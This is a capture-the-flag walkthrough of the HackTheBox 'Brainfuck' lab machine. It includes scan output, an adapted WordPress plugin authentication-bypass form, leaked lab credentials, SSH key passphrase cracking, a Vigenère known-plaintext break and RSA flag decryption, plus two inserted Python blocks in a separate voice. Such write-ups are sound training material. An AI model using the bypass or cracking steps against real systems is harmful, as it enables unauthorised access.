TJnull OSCP Prep Series
HackTheBox: BrainFuck [OSCP Prep]

Box Info:

  • OS: Linux 🐧
  • Difficulty: Insane 🙀
  • Release: 14 Mar 2017 📅
  • IP: 10.10.10.17 💻
  • Box Creator: ch4p 😎

Hello there guys. Welcome to my 3rd post in the TJnull OSCP Prep Series. Today we’re going to be discussing Brainfuck from HackTheBox.

Let’s begin with a full Nmap port scan to see what open ports we can find. I’ve used Rustscan because it hands the open ports to Nmap and returns results faster:

$ rustscan -a 10.10.10.3 -r 1-65535 -- -sV -sC -Pn
PORT    STATE SERVICE  REASON  VERSION
22/tcp  open  ssh      syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 94:d0:b3:34:e9:a5:37:c5:ac:b9:80:df:2a:54:a5:f0 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDUvFkWE1DxJj4OsU4DiVLjkxYV2a9pSlMS/78hpx0IejJaFilgNb+RFCyfyhIw5NvsZB6hZiNL0vPDh+MscPd75heIIgx9mczfamsrA2KODdkdgUJPCBWUnF9/VhYQhJpGvo4f6lAwLz7wnmcjhiXencMNkZcweADi5aK0Xp6iFxYcwx6+qy0891gQ5TnVVazkDJNA+QMUamxJRm1tQN5dp/+TeBecWJH2AxQFXsM4wPkIFaE0GsKvYDmGyfy1YL/Gn5IxEqVrhIEYkDH4BQsbvORNueOtJKHoys7EhPF+STpx6ZAXS6AXhS/nJMz6EvubzeGqfBOaDIZN9u5JuCdf
|   256 6b:d5:dc:15:3a:66:7a:f4:19:91:5d:73:85:b2:4c:b2 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCJcOJZuuBlw9xDXy+VPpezMomPfySGOjABaxw02cmRifvzWE57mh1hlQD6z44IF1lsuW9E2NNH4xB4d8U0O5b0=
|   256 23:f5:a3:33:33:9d:76:d5:f2:ea:69:71:e3:4e:8e:02 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOokdEAUqLEqEuY1CHNJ2xaDU+L+/0qb3XZO8UIZfrju
25/tcp  open  smtp     syn-ack Postfix smtpd
|_smtp-commands: brainfuck, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
110/tcp open  pop3     syn-ack Dovecot pop3d
|_pop3-capabilities: TOP SASL(PLAIN) CAPA AUTH-RESP-CODE UIDL USER RESP-CODES PIPELINING
143/tcp open  imap     syn-ack Dovecot imapd
|_imap-capabilities: AUTH=PLAINA0001 ID Pre-login IMAP4rev1 OK more post-login capabilities SASL-IR listed have LITERAL+ LOGIN-REFERRALS ENABLE IDLE
443/tcp open  ssl/http syn-ack nginx 1.10.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title: Welcome to nginx!
| ssl-cert: Subject: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR/localityName=Athens/[email protected]/organizationalUnitName=IT
| Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb
| Issuer: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR/localityName=Athens/[email protected]/organizationalUnitName=IT
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2017-04-13T11:19:29
| Not valid after:  2027-04-11T11:19:29
| MD5:   cbf1 6899 96aa f7a0 0565 0fc0 9491 7f20
| SHA-1: f448 e798 a817 5580 879c 8fb8 ef0e 2d3d c656 cb66
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
| tls-nextprotoneg: 
|_  http/1.1
Service Info: Host:  brainfuck; OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:03
Completed NSE at 15:03, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:03
Completed NSE at 15:03, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:03
Completed NSE at 15:03, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.84 seconds

I chose to go with HTTPS running on port 443. When dealing with HTTPS, a good place to look is the SSL certificate, which can reveal additional information about the host.

Figure 1.0

We found a new virtual hostname called brainfuck.htb and a subdomain called sup3rs3cr3t.brainfuck.htb. Let’s add both to our /etc/hosts file and browse to brainfuck.htb.

Figure 1.1

Take a look at the highlighted areas in Figure 1.1: we’re dealing with a WordPress site. The highlighted post contains an email address ([email protected]); let’s keep that in mind. We can use WPScan to extract more information about the target WordPress site.

$ wpscan --url "https://brainfuck.htb" -e --disable-tls-checks
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.18
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: https://brainfuck.htb/ [10.10.10.17]
[+] Started: Sat Aug 28 13:22:26 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: nginx/1.10.0 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: https://brainfuck.htb/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: https://brainfuck.htb/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: https://brainfuck.htb/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.3 identified (Insecure, released on 2017-03-06).
 | Found By: Rss Generator (Passive Detection)
 |  - https://brainfuck.htb/?feed=rss2, <generator>https://wordpress.org/?v=4.7.3</generator>
 |  - https://brainfuck.htb/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.7.3</generator>

[+] WordPress theme in use: proficient
 | Location: https://brainfuck.htb/wp-content/themes/proficient/
 | Last Updated: 2021-08-18T00:00:00.000Z
 | Readme: https://brainfuck.htb/wp-content/themes/proficient/readme.txt
 | [!] The version is out of date, the latest version is 3.0.51
 | Style URL: https://brainfuck.htb/wp-content/themes/proficient/style.css?ver=4.7.3
 | Style Name: Proficient
 | Description: Proficient is a Multipurpose WordPress theme with lots of powerful features, instantly giving a prof...
 | Author: Specia
 | Author URI: https://speciatheme.com/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.0.6 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - https://brainfuck.htb/wp-content/themes/proficient/style.css?ver=4.7.3, Match: 'Version: 1.0.6'

[+] Enumerating Vulnerable Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] No plugins Found.

[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:13 <=========================================================================================> (357 / 357) 100.00% Time: 00:00:13
[+] Checking Theme Versions (via Passive and Aggressive Methods)

[i] No themes Found.

[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:01:26 <=======================================================================================> (2575 / 2575) 100.00% Time: 00:01:26

[i] No Timthumbs Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:21 <==========================================================================================> (137 / 137) 100.00% Time: 00:00:21

[i] No Config Backups Found.

[+] Enumerating DB Exports (via Passive and Aggressive Methods)
 Checking DB Exports - Time: 00:00:02 <================================================================================================> (71 / 71) 100.00% Time: 00:00:02

[i] No DB Exports Found.

[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
 Brute Forcing Attachment IDs - Time: 00:00:03 <=====================================================================================> (100 / 100) 100.00% Time: 00:00:03

[i] No Medias Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:01 <===========================================================================================> (10 / 10) 100.00% Time: 00:00:01

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] administrator
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Aug 28 13:24:52 2021
[+] Requests Done: 3301
[+] Cached Requests: 11
[+] Data Sent: 910.235 KB
[+] Data Received: 881.963 KB
[+] Memory used: 274.586 MB
[+] Elapsed time: 00:02:25

A second WPScan run, this time enumerating all plugins installed on the target WordPress site:

$ wpscan --url "https://brainfuck.htb" --plugins-detection mixed --plugins-version-detection mixed --detection-mode mixed --disable-tls-checks

[+] URL: https://brainfuck.htb/ [10.10.10.17]
[+] Started: Sat Aug 28 13:30:48 2021

[+] Enumerating All Plugins (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 01:02:16 <=====================================================================================> (94806 / 94806) 100.00% Time: 01:02:16
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: https://brainfuck.htb/wp-content/plugins/akismet/
 | Last Updated: 2021-08-23T18:00:00.000Z
 | Readme: https://brainfuck.htb/wp-content/plugins/akismet/readme.txt
 | [!] The version is out of date, the latest version is 4.1.11
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://brainfuck.htb/wp-content/plugins/akismet/, status: 200
 |
 | Version: 3.3 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - https://brainfuck.htb/wp-content/plugins/akismet/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - https://brainfuck.htb/wp-content/plugins/akismet/readme.txt

[+] easy-wp-smtp
 | Location: https://brainfuck.htb/wp-content/plugins/easy-wp-smtp/
 | Last Updated: 2021-07-13T07:46:00.000Z
 | Readme: https://brainfuck.htb/wp-content/plugins/easy-wp-smtp/readme.txt
 | [!] The version is out of date, the latest version is 1.4.7
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://brainfuck.htb/wp-content/plugins/easy-wp-smtp/, status: 200
 |
 | Version: 1.2.5 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - https://brainfuck.htb/wp-content/plugins/easy-wp-smtp/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - https://brainfuck.htb/wp-content/plugins/easy-wp-smtp/readme.txt

[+] wp-support-plus-responsive-ticket-system
 | Location: https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/
 | Last Updated: 2019-09-03T07:57:00.000Z
 | Readme: https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt
 | [!] The version is out of date, the latest version is 9.1.2
 | [!] Directory listing is enabled
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Known Locations (Aggressive Detection)
 |  - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/, status: 200
 |
 | Version: 7.1.3 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:05 <==========================================================================================> (137 / 137) 100.00% Time: 00:00:05

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Aug 28 14:34:00 2021
[+] Requests Done: 94961
[+] Cached Requests: 39
[+] Data Sent: 25.292 MB
[+] Data Received: 15.184 MB
[+] Memory used: 510.785 MB
[+] Elapsed time: 01:03:11

Let’s have a look at the plugin “wp-support-plus-responsive-ticket-system”: the installed version (7.1.3) is outdated and vulnerable to an authentication bypass. Have a look at the exploit PoC on Exploit-DB.

Figure 1.2: Original POC

The PoC adjusted for our target:

<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">
	Username: <input type="text" name="username" value="admin">
	<input type="hidden" name="email" value="sth">
	<input type="hidden" name="action" value="loginGuestFacebook">
	<input type="submit" value="Login">
</form>

Now we can host the exploit PoC via an HTTP server. I named my PoC file “ticket-privsec.html”.

Figure 1.3: Serve file via HTTP Server
Figure 1.4: Trigger the exploit by supplying the username

Now we should be able to log in as user admin:

Figure 1.5

After getting admin access to a WordPress site, the next logical step is to leverage that access to get RCE on the server. I tried to:

  • Inject a shell payload into the WordPress theme. [FAILED: no write access to any theme file.]
  • Upload a shell plugin. [FAILED: not sure why.]

I kept poking around. The plugin “easy-wp-smtp” discloses sensitive information in its settings page.

Figure 1.6
Figure 1.7

SMTP credentials of user Orestis:

  • Username: orestis
  • Password: kHGuERB29DNiNE

Since we have the SMTP login details, we can log in via an email client (Evolution, Thunderbird, …) to see if there are any sensitive emails in user orestis’s inbox.

  • Email 1:

Figure 1.8
  • Email 2:

Figure 1.9

User orestis’s credentials for the secret forum are:

  • Username: orestis
  • Password: KIEnnfEKJ#9Umd0

We already found the subdomain “sup3rs3cr3t.brainfuck.htb” when inspecting the HTTPS certificate. Let’s now have a look at it:

Figure 2.0

This subdomain hosts the secret forum discussed in Email 2 (Figure 1.9). Now log in as user orestis. There should be 3 discussion nodes.

Figure 2.1

Node SSH Access: the conversation moves on and user Orestis opens a new, encrypted discussion node (Key) in which the SSH keys are to be discussed.

Figure 2.2

Node Key: this is complete gibberish; the chat is encrypted.

Figure 2.3

If you look closely, user Orestis always signs off with the sentence “Orestis – Hacking for fun and profit”. A fixed sentence that appears in every message is a known plaintext, and it might help us decrypt the messages.

Figure 2.4
Figure 2.5
Figure 2.6

The key can be either “brainfuckmy” or “fuckmybrain”:

Figure 2.7
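As an added example (my own code, not the write-up’s or the forum’s), here is why a known plaintext such as the signature line gives back the key, and why it comes out as a rotation like “brainfuckmy” versus “fuckmybrain”: subtracting the known plaintext from its ciphertext yields the key stream starting at whatever key offset the line happened to begin at. It assumes the forum used a Vigenère cipher over letters only (the page does not name the cipher); the key and the sample post are constructed for the demo.

```python
import string

ALPHA = string.ascii_lowercase
SIGNATURE = "Orestis - Hacking for fun and profit"   # the line repeated in every message
TRUE_KEY = "fuckmybrain"                              # only used to build the constructed sample


def vigenere(text: str, key: str, decrypt: bool = False) -> str:
    """Vigenère over a-z/A-Z; non-letters pass through unchanged and do not advance the key."""
    out, i = [], 0
    for ch in text:
        if not ch.isalpha():
            out.append(ch)
            continue
        shift = ALPHA.index(key[i % len(key)].lower())
        if decrypt:
            shift = -shift
        base = ord("A") if ch.isupper() else ord("a")
        out.append(chr((ord(ch) - base + shift) % 26 + base))
        i += 1
    return "".join(out)


def keystream_from_known_plaintext(ciphertext: str, plaintext: str) -> str:
    """Key stream = ciphertext letter minus plaintext letter (mod 26), letters only."""
    stream = []
    for c, p in zip(ciphertext, plaintext):
        if p.isalpha():
            stream.append(ALPHA[(ALPHA.index(c.lower()) - ALPHA.index(p.lower())) % 26])
    return "".join(stream)


def shortest_period(stream: str) -> str:
    """Shortest prefix whose repetition reproduces the whole stream, i.e. the repeating key."""
    for n in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % n] for i in range(len(stream))):
            return stream[:n]
    return stream


def rotations(key: str) -> set:
    """All cyclic rotations of a key; a known-plaintext hit at an unknown offset yields one of them."""
    return {key[i:] + key[:i] for i in range(len(key))}


def recover_key(ciphertext_line: str, known_plaintext: str) -> str:
    return shortest_period(keystream_from_known_plaintext(ciphertext_line, known_plaintext))


# Constructed sample post: a short reply followed by the signature, encrypted from key offset 0.
SAMPLE_POST = "Pleeeease....\n" + SIGNATURE
SAMPLE_CIPHERTEXT = vigenere(SAMPLE_POST, TRUE_KEY)


def demo() -> dict:
    """Attack only the signature line. The nine letters of 'Pleeeease' have already consumed
    part of the key, so the recovered period is a rotation of the real key."""
    cipher_sig = SAMPLE_CIPHERTEXT.split("\n")[1]
    key = recover_key(cipher_sig, SIGNATURE)
    return {
        "recovered_key": key,
        "is_rotation_of_true_key": key in rotations(TRUE_KEY),
        "decrypted_signature": vigenere(cipher_sig, key, decrypt=True),
    }


if __name__ == "__main__":
    print(demo())
```

Any rotation decrypts a message correctly as long as you start it at the matching offset, which is why both candidates in the write-up are usable.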

Decoded chat:

Oorestis: Hey give me the url for my key bitch :)
          Orestis - Hacking for fun and profit

Admin: Say please and i just might do so...

Oorestis: Pleeeease....
          Orestis - Hacking for fun and profit

Admin: There you go you stupid fuck, I hope you remember your key password because I dont :)
       https://10.10.10.17/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa

Oorestis: No problem, I'll brute force it ;)
          Orestis - Hacking for fun and profit

Now we can grab Orestis’s private key from the given URL. The key is passphrase-protected, so let’s convert it with ssh2john and brute-force the passphrase with John the Ripper.

$ ssh2john.py id_rsa > john-key-to-crack.txt
Figure 2.8

Now we can log in via SSH as user orestis:

$ ssh [email protected] -i id_rsa
Enter passphrase for key 'id_rsa': 3poulakia!
...
...
[email protected]:~$ 

Post-exploitation

Have a look at user orestis’s home directory.

Figure 2.9

The file encrypt.sage does some crypto, RSA to be precise (you will find the variables n, p, q, e and c). Let’s try to understand what’s happening; check out the comments in the code:

# =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Script begins =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

nbits = 1024

password = open("/root/root.txt").read().strip()      # Read the root flag (root.txt)
enc_pass = open("output.txt","w")                     # Open output.txt for writing (ciphertext goes here)
debug = open("debug.txt","w")                         # Open debug.txt for writing (private values go here)
m = Integer(int(password.encode('hex'),16))           # Encode the flag as a big integer m (hex -> int, Python 2 / Sage)

# Generate a random 512-bit prime p
p = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)

# Generate a random 512-bit prime q
q = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)

n = p*q                                               # RSA modulus n
phi = (p-1)*(q-1)                                     # Euler's totient phi(n)
e = ZZ.random_element(phi)                            # Random public exponent e ...
while gcd(e, phi) != 1:                               # ... retried until it is coprime with phi,
    e = ZZ.random_element(phi)                        # so that the private exponent d = e^-1 mod phi exists

c = pow(m, e, n)                                      # Ciphertext c = m^e mod n
enc_pass.write('Encrypted Password: '+str(c)+'\n')    # Ciphertext c goes to output.txt
debug.write(str(p)+'\n')                              # p gets written to debug.txt
debug.write(str(q)+'\n')                              # q gets written to debug.txt
debug.write(str(e)+'\n')                              # e gets written to debug.txt
# p, q and e together are the private key: whoever reads debug.txt can compute d and decrypt c.

# =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Script ends here =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


'''
Here are the contents of the files below.
enc_pass.txt:
c (cipherText)=44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182
'''

'''
debug.txt:
p=7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
q=7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
e=30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997
'''

I found an RSA decryptor online that, given p, q, e and c, makes extracting the flag easy.

Figure 3.0
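As an added example (my own code, not the online tool’s or the box’s), here is the same decryption done by hand in Python with the p, q, e and c values leaked above: d is the inverse of e modulo phi(n), m = c^d mod n, and m is turned back into bytes to undo the hex-to-int encoding in encrypt.sage. rsa_encrypt_bytes mirrors the script so the round trip can be checked on constructed parameters.

```python
from math import gcd

# Values leaked on the box, copied from debug.txt and output.txt as shown in the write-up above.
P = 7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
Q = 7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
E = 30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997
C = 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182


def rsa_private_exponent(p: int, q: int, e: int) -> int:
    """d = e^-1 mod phi(n); it exists because encrypt.sage loops until gcd(e, phi) == 1."""
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e is not invertible modulo phi(n)")
    return pow(e, -1, phi)          # modular inverse (Python 3.8+)


def rsa_encrypt_bytes(p: int, q: int, e: int, plaintext: bytes) -> int:
    """Mirror of encrypt.sage: m = int(hex(password), 16) and c = m^e mod n."""
    n = p * q
    m = int.from_bytes(plaintext, "big")
    if m >= n:
        raise ValueError("plaintext too long for this modulus")
    return pow(m, e, n)


def rsa_decrypt_to_bytes(p: int, q: int, e: int, c: int) -> bytes:
    """Textbook RSA decryption with the factors in hand: m = c^d mod n, then int -> bytes."""
    n = p * q
    d = rsa_private_exponent(p, q, e)
    m = pow(c, d, n)
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


def recover_root_flag() -> bytes:
    """Apply the decryption to the leaked box parameters; debug.txt handed out the private key."""
    return rsa_decrypt_to_bytes(P, Q, E, C)


if __name__ == "__main__":
    print(recover_root_flag().decode(errors="replace"))
```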

Got the root flag.


I hope you have learned something valuable by reading my write-up. If you like this post please share it with your fellow hackermates and if you have any questions & suggestions please feel free to post them down in the comments. I’d love to hear and learn from you.

If you enjoyed this write-up show me some ❤️ by giving me some respect 💯 at [email protected] which helps & motivates me to create content like this for the awesome hacking community. Have a great day guys 👋. See you in the next post.
